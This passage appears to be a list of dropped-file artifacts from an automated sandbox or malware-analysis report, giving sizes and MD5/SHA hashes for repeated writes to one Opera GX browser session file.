SHA5129ed79cd96c8e249d2fa8040ed56184f3090abedca272f8e7da74c8ebadac4c5ee7a060f8a99b9887fe6b1aab9d81ea309350a7eccb9fcff396e681a5fa756a27
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize8KB
MD5784fa8dcb618c80d1409b2f79423912a
SHA1ca75c14f5071af61d29552189484f447109a31e2
SHA25657eacff4f3dfc9fc4578dbf11bc1ae23fa8c8f5a37017383f7d4454c61639149
SHA51207f1989aa3a04f619c847a8e405a09df34ca87fe922505ecd942b3137244ad9ebb23765e26a4b8e2755cd98e2fb239c353e1382264b1512ce8dc3e1c9e056a9b
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize7KB
MD5269931625ecd3029f77df7b0deddbfad
SHA1e995bda56eaf42f36e28568972665edc7abd7cf6
SHA256db5c10036936fc88ffc9ad8718b7d6653de5c72629825ae9da237ec98a9c9871
SHA5124c25d03cf036f05a6afae3e009de53c9cb5cc9554b47dbf84e6a1282441727db721b3b154ba1e136c61641c0a6d10fafc02d0f70e50f1adcebfa5435b8a950e6
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize7KB
MD59903a2f98da97106e93fd60736370e45
SHA1594d2964d52551ce3a951f09a769e7d219592823
SHA256dfa3a17b6f1ec8508183ae7ec5c45505b689d7069d6f797f764e5948f04a1205
SHA51212ca207f557d4d61c2327999fd54ed67f21990e50c3e2d3bdea1ded1b6ffd7d0501a81a2352d7dddb4d04b0d4ac2124e1d344f9c9198ff1a1d3708a10480b545
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize8KB
MD52bb1ce24626b9befcbeae56c8377c65a
SHA1d747dc78a6a473233966feb1d9168d6f3e338967
SHA2562890ef273c8130b9475bdeec5c4d9e591970461d279d2b0e84af53973b24782d
SHA512ced3fb13ee8b1fe71a089a12eca9548e94c3b29dc40f8614c104929d17ad74ce75cddf0e3fef227a33deecc852a3b387762d6eb06202086cc5d4a9eb09d9a659
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize11KB
MD5b2c9c11cee188d39fb217174e2099e57
SHA1db00cd4967e6ecabec20b39fc34986710816a658
SHA2565df03521d4d230af7be6cbec0e6674c22515757f8e6ac58bb64401a368619dd6
SHA5128037ed3c627e6b4165631100e98fa9bcefe0dd4578c0f77b3a45f64a593cc66815bb50d800dd255f7a6cae52ab43d24a3debf1ebffbf5d92e94eb28f26179bb2
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize8KB
MD52d98b7f4cc130da981687dd76e92bd27
SHA107d0d7ea27e511046e95fdaf2b67c493c33c87b9
SHA2566a6786ea7d1d0f9e46279e547971ccb3f084cce339ceb8a12bbc6ae27bd7ff0c
SHA5125aad8b126567e5f91835ab97d0590fc70d4c48665117758a4b645b2191dd353f0c0ad47fc032f52e1663d08a4c6555f355a857e32b1135520ef42569d356af70
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize8KB
MD5d4e2e9238b5124bb5fec18a235980fb5
SHA121425a30f68706d2f53ef117de02dba93224bfec
SHA256a8105f6be2c74d7311e677f3b5e07f672a64c5cfb8715489be0d611303a7e237
SHA5123ce292dc0fc3a01d0822906dfacf2f5dc1c3eef10c94c81f88cbdb18bdced2ba2dbb930712144170156075a1473eebfb14713925085458069c63370f59679172
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize11KB
MD53361364cb9de0dccd451d8fe7605b075
SHA1268f9bdafab9545d3c44b18b2fe7f2bac1463f83
SHA256b16ff4535066af9e643668e7af0620138a2a6d4bb126f5faef277161a3f995f4
SHA5126fd7546ffd1766bcd6d3564f1d60c0b7629cf474977c74c25a12bf67632c7e89b15ed4a678e8264fd834b3e6e2e4a7e8b7ab3c8c56c757cb3c628003216bbd06
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize11KB
MD5eb068b179020641022253c5728adb3de
SHA1a51c52eb10bdedf6decb011d214eed52f2048a4e
SHA256a6828c19548239568aa892010e3522703c10d95ae36aa5cf61f4405f55765767
SHA512fc5a751ba917fedfb192774f0d421279258e4b6c5f2d1f3630689f13d6d397e6b6df512b37118d2f12dc1d9b9a7ee348151a7186c095dc47e52b6ceb7448fcbc
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize13KB
MD529be63674f72d9ff7e56e9def188e64e
SHA1b6608dd9385565523bca325f4c480c431413dba1
SHA2566a23641aa790a7105e9622e9adf403030c995d1de5801e2da91bf0b7588f216c
SHA5120600c8638db898ea3092112d50d62ed50c4316422d07ae31a02bbe924e253439a8029293a52d942aeaf7ea2fe5e87a9999a5bc6b6fa969b5c07baecddf85a39f
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize14KB
MD5d8b0eed4a1ee681922409230997d9bf8
SHA13a6c4c54170531573bac887db2fcc1453388b41e
SHA2564280317c20c0f25f8304b9883019935f4e68932352aaf5b5a214e1bccb732b1a
SHA5126937e1fb3d5b4b3342f54835983b82467a182de7c70b06f8f14e7b4324db31e44d9547a52b41538d6f246aba661cf3b7b48d2fb6668fb992a02667c593ed2a6b
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize15KB
MD5a738b3503ded20f96c7b0966b21a3c29
SHA1a3631d0662d05b4549c577e8965b596565e83852
SHA25681a641b62641718e3dbd6ad4b0601780e4f4bbdddd899fa3e9f30832112879e6
SHA512331431eddef93eef66af46b7e11d6e7e66c2161dc40b11b58e388c30520d79e655b6fd3257b421ad6e654d068052db1bf839d6192e521c813eaca9278ed6ef24
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize15KB
MD5e3a285902330d79cd98f5481bf98b764
SHA10320243e473c83854ee7e3b134e5a363b047dd11
SHA256df37a473f4a853460195c84aa999b95c9a470c8b41bb7684ab73999b3388e384
SHA5124d6805602dba8bdb16a5fe7e95387bea8e0861c20a8620eecbbca30a5cb6abe8dee95bd878d702427e6c63b60696389d1d42afc583e5d4bb612b4b6d1118d1a2
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize16KB
MD5e5bef62fdbe916a9995823f747a6f9c5
SHA129356dcffd57a87cf944496008ce32f12298a3b4
SHA256d1c98370213867a2d003b228447788848a69a85924ebea111e8b5f22e77afdde
SHA51241a69e25b2b9f7507d805e440c97437027dea01a5e62f653474909cb660c06314671957ae818328d2e1770f79370b3e7ec4d4b3a37835d05fec9cd87e6f5581a
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize16KB
MD5ceb7f4be3544db16006d783ec781f32b
SHA109e8e2e3686eb0aba9527977bc183628165f6515
SHA25608837c97fbc63bf3a0ba1251c69650d94393ec0e35ee8a037fc3690d2a1a4247
SHA512b8c7ada6ded70227feaea8559a5ab0cf3a5c5669236e8557b1d4ddffb14f5b5c4f88c2e381dec4ac1283d54c8eec9de4a8d4be84263ac210102ed98fbcc24f7c
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize17KB
MD5f5bc8089fa325221859d55bbe63ae063
SHA165a0fea9ea4493a394738e0266aff71618e062f9
SHA25613959b848e0e3d6513ae041b3e38f81b12c30c7c6428a24ad77d71d8807b3e4f
SHA5129b0eb7cf58a4aec537b4ba9ac4600bd57343966bec245a2921960592641fefbf1a7d68419a8458c0e03ac2d8ee81a3fe5c0e37d307a13efc70f57dae40c61413
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize9KB
MD5d404c063262cc06c8beae11bdf12779d
SHA19dcd437a275990f51ad67d307aef7ccb7d5b4e82
SHA256ddce46f6d594ddaf2d53a2e49d8daeefd59b0c440f3f900cd3875c369abddd9a
SHA512a2b1526f1b1d709c11e7ab45981194d524d786384cc778054d899a5ad328f75112b491629fe0a9ef58af5e026375e4ee5392f9ddfcd0e7a14e991885b86177e8
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize8KB
MD571d875035169f486c2b67d44b2ae7157
SHA1b4888164fa984455331c3b1374d668f95a5f61e3
SHA2563b6b7ec163f8773ad06faed3ffed000c7d31ac58c9aa27202b1e362b9f6d5703
SHA51236099d7d390e4f95ecca71847ef582f52ab97874c25c67a5fe24ddab75dd3e2dff07300b9e60e42a31d6d61bd0167d1aa261ae485b596d44518b063a28d2bf10
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize8KB
MD59ecc9f728eb20bcc5be92149ae57a464
SHA10650e93a2cc490d3f663b458958e4acc0eb5c56b
SHA256991d8823a5bec29004cfc4438b49f066b916232246ed94a010023602be4d8a86
SHA512e7b36590d8f27b29bd0cedb66a3dc08f74e03da9bd6f68e1c85b0c7b2a7b6fcedd9d0fcb6467ef7b6fa23e7331776049eb4fa51032369e815fdae650be692826
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize8KB
MD5cec152668003ec80996d3b53b96cd2cc
SHA17e0cb7785068425cdc10b1af071f1c0616c4d4f5
SHA256685a140eced10341c601311f8abe399bfa145bd78787fe67dcf265d03281ad49
SHA512bf3d6e645e526f98032678d4da2ca43fc0bf00e4619420b036f85d99c52801497a886e882b69b2a3fb0bef5cbeeee98b7c4fdec3e74e90034dbb52d469aafc8f
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize525B
MD5d76cfc93c1a9f2fedba3682c0538300f
SHA1a526cb6a2db4d6dfb01992c77ac8921c77db4889
SHA256a3dc7cfc0af07def7a0a65361bc8cc41512625275475476247cbdb3262f95de6
SHA51231cf345ac21735c770ae7a1302b06b4adbe17f6d0c03244fd2e4ba67cf327602ecc2fd82bbf3396e2427eb1317843f77543b09d2e4be8dd3f8499616c04f5716
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize877B
MD5ed8806b4ad8065fe52826b8c1e382f78
SHA1950739b42f5be26cc5877bcff41ace980e5200d8
SHA2561c734e421323e6219018506ee63bb5f4bf39a38511fa0daeb2c905359ec5045f
SHA512a244cd330befeddd33e479fd33b083df3827e2e97b550d0a81195831756c7a8c8587b595b19b8ef213fb98bcf3e8a56dc165f9bffd8f4443953150a2d72849e7
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize7KB
MD560c463bd66ee5c4d6de14c4d43e3cc54
SHA1e7b37512225be06160b7ed36dd05dd8ba038ce81
SHA2565b2aa7678b4c0a51c46847b6794b3d729e9330bcb1dceb4a17ea6a60472bda6a
SHA5129fa5a4e065f59df55d0d3e2686b4b7e7823b48abce91f65a133a02b69c453c155d232e29333c58e08dcfe02a192d4d13d6053971ac63270fc89c89c4288ce68f
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize8KB
MD54a9a8a2e88252efeb96d41ae64811698
SHA1cad99529efe3a50b2b51b8976d059a73840bedea
SHA2564439bcd4b1d843637819a6ed5963bcfcd07c98ce1f2c7aaace82dbe42fe182b1
SHA512a7d74897ecdce516cd942beb3ffdcb609976b69d35b4a8ed58013dbded19b7d5cbde1b8f86a7d8dce5fd0a054b89bb10265a84e786ab3b96826cb183fd64a18e
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize8KB
MD5a93cd970854b1e34095d51e59b278b78
SHA1a2e3065b2ec33416743d5b3da0b654ffff97ae20
SHA2565e19a0a18c925ced3202adf6e5c46afc1e2bfbe5e61b23b5c0f9a6187aa627c9
SHA5124b513472cc6cdebc1f123dccf8d23adfd81ea3abbccb48f00862090d4ad978c67fbb75a979b79b51c19043295029e810b227f2036db9680d0ebc3e6799971677
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize14KB
MD52b068c2b5527319b0bc597e61b54b8ef
SHA1885ef1f2dd39e43a19b15590843dcb30fe4a6a4a
SHA256510210ff9218b2c15e43836443905e43152cacb9a2960615edabb00ea6df55a2
SHA5127ce0181ea2f23a67a6adab737a50441c9fca340858d108571b85b071a15c0b18b6e3a4f358cf9275f89d26f6e5272b917c1da60281fe944f0c8724202cb4eb35
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize15KB
MD599ebc2999d2045eab55df43531887c7d
SHA171ed5159b64ef47a0ebf28e10372e862df0d0d8b
SHA256e8653a48591c45e1c571d68ebf0877d39b4eb72cdf7bd0f84177ff65d2ea1206
SHA51292c0924acca82dd14983a4fa08541c1d3611d938951084e989a36cf4e1f14c1b83e544efbfb718a2ed49e1764fc4d75c60261c596c75561c3beec7665adf0cba
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize17KB
MD502046bb9feb73e94b22b16bf170c726c
SHA145508942e8343ad305e35d09e992a8bded0f9f84
SHA2567a0b13f339ce5e4b7400bd234f792b9772d6ed08994fe3e518f3cd7c73a8188b
SHA5125a9f5251f8eabfdb0b7493ad07004e402bfd37d6388e2bd48da9bcc079db72b8438831d58bd9e5a64d46847ecad848e82fd8620425beac7e6e402744760811e8
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize973B
MD51c70176a21548717250b5bdc1d8ec113
SHA10eb5926fee78ec54af6eb2acee7e1292acfa2709
SHA2562692d133b49ef1c995ec2ff0d17f9576fd11c9fca55791858a3a39ad67441a53
SHA512acc3ccb5bf03f44f4252c4c735b767c79bcac27c11eaee74cc9c6781444f836f011747b786abee4b154b0053b846979967648f5e76f868431503fa718289b6b2
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize9KB
MD584cb10efdae89f7dd0dd995b075f0b73
SHA1bf2de6a7c70a9bcebfc7f6db4e9f44131b9aa832
SHA2564ceba34430661ddbf8f5e53887f5c20b200defbecf3a27486181a49c118c8f50
SHA512be0aec5cc8a9f7848c9f9d784d89523b028a359cb1070c404791b19619cb71895349ad19b6e30bcaea53087e26c337f8b8a9ce2fec7353e2ca76204310cb6b45
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize8KB
MD558ce783e4cb805af63ad0ff52908b023
SHA16fb9a609c65475a98694360421e41190aa872aca
SHA256ece79e304b6ab9675c5216f4e359a822800779ea1f26ededdf47025f9df25181
SHA5120cc2d3ba0587f0b131d354856b28b8592d9aa5a87e7ebf3b44c9ba85d4a7314cbb2fefd9301f8e465dc663826b6c2f56b1750255cd7742381d5f06858544f803
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize621B
MD57fb5b49ee856928a308c25fe7135f13f
SHA1e0b8a24bcd9215df87222f92c3ee06b1519f8489
SHA2560795018fffd45a8a77eaf89748e4d428a788de2afcc6f39afc48ccb906b1f6ef
SHA512f32b24421c3e7d69d8e790ce4a1c285f46adda40fb7d235805a4df09ab8ef00f764927aeebae9951df2c44727825327682093266bf9ddb02fcafa0070bb909aa
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize7KB
MD56f354b621489c6a242b3b3cbbfb7b2d1
SHA176a27d1da105d2c8440928eeb22f46a187f2fd64
SHA2564377dc4f94093a9c2a1163fef11f682e16d526282e27092dafa305692be73cad
SHA512225b3fb37626af63fde8a54bb416e90692ef6a584c71095bf6bfd10c96cd02cab2c7ef454964a1e2ad4a435d08c4c129c1e05d928d15f32cfa8c7d1a5ed212a2
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize9KB
MD5524b97173950056ac5c6405b9c3b6d70
SHA148b05f78e529bfcd0bde590a9507c7473a16c025
SHA2565a40bee03d53155b0e2611415db51b3ffe42f59a21b713358141efeb9e1ff117
SHA5126cca3857db4a3241a1b1f4ed4eb4cc45b91d469bd993af7aee37d58bc7f9788d33e086dafe484dffaeca6a98abf4c1517123fd0a98040d9a87bdc200a87ac936
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize9KB
MD5d2e860d562eeb2eeaed9dd3f0a1f3d12
SHA1fb2a401edc41a61227e787662b71583a663b9d5b
SHA256aa20292da34ba3c9c8cae0682f288f4e9fb41c163ef9f1ce89d5082240d295ff
SHA512677de2fa02fa025564b6830a68f356a209694a355ab5048749fd0545539a4c22496c4fb4dea9cb0b3c24382b2fc76ad555b3b79e1f813523b0648f1026bc7764
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize9KB
MD5d1be8cfb64a2674b828b895a6fcc0db4
SHA100aff45350f7a140bc4c5e60596fe78cc94a9c7b
SHA25668dd913ca417254d952b4cbe4b2f177041f836824c72ac586ea0685d78545b72
SHA5125490815efc7245f938d236932d446c85223b8dd41525c5dfd309e3d49a1671daf79559535360d7c5951ce5e15527a6d495beaadd8c8b4d91c84a605d56326c9f
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize10KB
MD552d8f8acabc766423cc8a8a732a1f463
SHA1a6cd95982ce50336b3771c9caa73b44bb5bffa78
SHA25659c4a3600294c207efccb7db45881c58632f4968107f5447b9df5339d26b90a1
SHA512d96fb0230ca28f12bda279d782762dd229c5d95f52eedb7ac3d92b0c107aec0b95cda149c6d4b0803e3771b83c9914fc3b40983c2ac689437704b9058d566c84
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize14KB
MD534ecb1c2b631de0edb7c13fa0f1a0389
SHA17e702bd8bc4983141b01840b297069301d1eef48
SHA25640eb2e123bf9a1060418e17f0950ee908ec04da5dc72d6e932149e9f472e83ee
SHA512417643c6690df14266fb098d6c4c0cca7dbacfebb4825264795a5d032f7a0da9c21dd943666767031092c4a0367405e32a54e9ecb3320e1312db956b7d2b2e18
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize17KB
MD50b04b3c9b2c43d8d1b199ba9b6e2c1bf
SHA134ad15fbd05ccbf675552bc1b990bfa4b2a76a01
SHA256809d1181e90e4e00f3c4e5133a4861bc44250d8d59fcd009084ba4d92fb19173
SHA5120ab221acd3ebda76fe3d83fc61e785d2a864b72ff7515a391c4bf76167fe28d0befed691c59357eb5f1a694cbbc9d0f85973896244e8052d05400e050dba90f6
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize17KB
MD596b2fa66217a36a9ecf880c5c3119857
SHA16babeed53d5007b8d5f057360511744438d53edd
SHA256e8b2c167f46eb7ddac938eb7c5edb504791b6c548985a10ccc3605037ba63fff
SHA5122a29eb224e62440d153e660ee8ebddd9f486cbd3bbe4a4bd8b4b4f37c1371be41561c70b9dc95a5562d7a0bb621f3f193dbe300eeadf50831304f0289f0595cc
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize1KB
MD5ead8af090120cdb5e29010d2fccac189
SHA18e79b09ec4166dec1bae881274d3ddf5812e62b0
SHA2568f70955bd0f98f3fffba8fb87d07f34ce3dd611902046497567627801e415c72
SHA512f986f11955f306d2a3fd89efdfe172ace62786370f5bb341b6e3b030d9ad1906ea830e99a356d75fd6ceada2b28af98a61d1484d9a4133fdccbac82722f20074
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize9KB
MD5c64e5bca8a363ca15a1fe2be699418d8
SHA1fedd795417c58d8dcf570394bf163ce6dd14e196
SHA256e9bfc57c55e584c0ed3697deb8fbfc3f45a58baaa0075d406f64f8f249c46a95
SHA512b0af0226f6500dabc19c920824ee1e000e634544b625792578e67b1ea6a7a610c1c7a68f9d22f3d855b78fdca42f6c5e62f6cca1e3464de0f4ea10c85c480147
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize6KB
MD516892e5edc63b044d731e8c95cfb04fe
SHA1c7e2da5d69acbb462f765285ac8faf1170ef7693
SHA256e0d54938858be4aa37b22f17d20b2ffdfaa89ab4d7802295948c5412f325f006
SHA5124a079d4b7a1d522214209741379299fa7e6c337e747a7be4ca11e9771dede3250440daff2b7b25eb375715257e8d259b2aaca4a803b19d3f03cf8854c2e925b1
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize7KB
MD56d076ee58a5bd8800c4db000002840b2
SHA1acc61e756d60144e69808d98a8543d574d26e7e3
SHA2565861ef196c7341f79046fe657b51d80ecd9e00968bd8c98d15b1a383d9166ead
SHA5124764c3821c47ed647a50f0a724d719333e52e9be6369660889d36e0c8a7c9eeb8b1279b6127b88bd499c672d533f90ed2022eae57c7dd6862f8b93668a126a9c
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize9KB
MD5e58fd3c95833cb4011ec2eb7694b10be
SHA196d260728c29aced61575be099e73ab1c047c6ef
SHA25660286606a804c132465614395c2e60a98e140b524e4b58501958393e3839727f
SHA5120cc1664b61c74c74a206fdb907284eafb034d0bcc8cd0a79b9cb8471def5005ecd02b3962edd753ead8428c444588648af1d3e1792920208138f5cf5e210f9b4
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize10KB
MD5302dc4934f50a937a4a7d2ba23707eec
SHA10f33c17c071d9a3d33c57c80631db4143414163d
SHA256b313e040de860a6d48db5f89bfba85365a80ded426b8ba80e6d87b35e8c162c0
SHA51216f4c8b6b4a929a270ef959091e41ff999ba93571d34c2cbe9c4a1081e433e63ba58489a5f563ab5ebfa205a02c41f421e90432a95d758aed4af16d773c3ff02
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize10KB
MD58ef5f38acdf9d252e4b3be127f847dfe
SHA176a8288039afb2c9544014f3d8f429774c1be3d5
SHA256e063f0963d6d8b50346f9bbedf7bfbb2af2bc2c06493fd9cdd1cc1f05528206f
SHA5122422b2e8b51e2264387952b0a7b9b94e29a00cfa83c639f4c8f8aea2787e13523c8a1d953dd1133997a0b135855b7d0737b706c9014c9cbc035a96d2f88816c6
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize12KB
MD5329176ce033be153d357602ccc08b390
SHA1c88c9e8c7a89a4390ce339cf1a401e44bde1fa62
SHA25671bf33cfbf73714cca37bc214b659c0ae70e24450b3cc32998435130af702fe9
SHA51218fb172322f47ffa22bbd07dcd1040871c86e29abe3916d8e885c134a2e3fae49525983395b37a815dae7edd06f0822b279083055cb43ae806a98c02f895bfd0
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize10KB
MD54a3bd01b49a22f889e6fed5d5c0f7f83
SHA1f9b3ab2bfa813e1554dc72ad0668993b1d895317
SHA256cab0cc5694d6d93170499611ebde5b025e0206466c8d87ba6d703975edafaf04
SHA5125cda2bdcf58da292ee8e6a5305fdd9d1ae107d4c020aae81f367cbb8d12a13d4c4f192f0590535502031c080b063af3894ed1e6ef7ec7c61239e495e8c23df9d
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize10KB
MD566559c69637f71c15afeab52669d70d8
SHA1538d1c380eeebfd28b3537c28a6a84a6b6a494ab
SHA256fd029efa864b3a3c4cef269e9b7efcca45c9f94af1827072545f4bd81bf26f59
SHA5121e2cef3f021b0acf54cc938643201c3621ca191b4506ff7ccbb62b71516c1a4abc130ae0e584524cf01b4573c3744013ca78f9b2ba18988cbfd203eac2b79cca
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize1KB
MD5e8dfe26c1443571ba25a233ffd52f620
SHA11b7944f5691e0eebaade6534a68407bc8f3adbba
SHA25612182bce0369e1cf02e6c658b8df296ba3bb8934011ad1a5be0dc74d54295c80
SHA5128f81256f5af1952be95883c6ebf148ce0da1e3309b0979eaeac690eddac8a46d2f93b64c507d49b571756111fe75b1168071bc82210e1ffdd7a9c92055348ed4
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize6KB
MD5572c287c549f99ca063eacc592119ad6
SHA1a5afee8abda60f03390a5780dd56441167038588
SHA256876eb1203747dd0b3d448a2483d32aa1a488c3382675b0c83b95e95f4879e68d
SHA512d286266c59931981d3901f9745439f7b2ce7729b0d1c446ca30f9781dd956074f36daac362f6aea69a116397359e73b8eca7d210633110288b7a87d154ec95ba
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize9KB
MD51e0cbba16ebb16aa2e9ef7e3dc4dbd15
SHA16c054e9a522312dc9a2de58f6f9ec195352e1d41
SHA25622b5a2da20078eddd7ce4b3112fb5687da179a5cca32009958157aad546f3fb7
SHA512738e4886a1100e2809bdcdb6dc24007921a0cbf9ee0af83b5f525010c239c57706e797454ecc4436c40dce71d01028895c46e3a4cd29bb4fe1c8fc44d500bf19
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize12KB
MD5fec147e7f7e638292306d4f76a6f73bd
SHA197350ad9ed57d2e9a8988c6bdc16a459060d9c71
SHA25618e97df57572338f8b8456ed1d1922a612abddc2378fddfcdee215675092458b
SHA5124250060e96d1e9c5d409e6ffb2745874bdecfbc27b86147578f8c3587cbac316e6ea4b0c981434f42002569df7194dd88ff4fb1de5823179973ca4c8bf5f7645
-
C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\StatsSessions\session_0133d939-1ae3-46a0-8076-b87eabc854ea.raw
Filesize18KB
MD5da85210bb3de8569c363c64af67c0959
SHA1f4a6ee92c95363a68fa7dc9e8d870a2a216b840f
SHA256440d5d569e412ce342fe80af277eb0707db2dcf8ea7f013166de7d0acfc1c0d0
SHA512b9cdaedc8e2a5cab78a0990d9ac9b7bd4d52ba59f0dda61854e460ab651b635c1cbf198ff4e052cbd52c46be7db2859164085f11bbf5065cbe812390608f9955
-
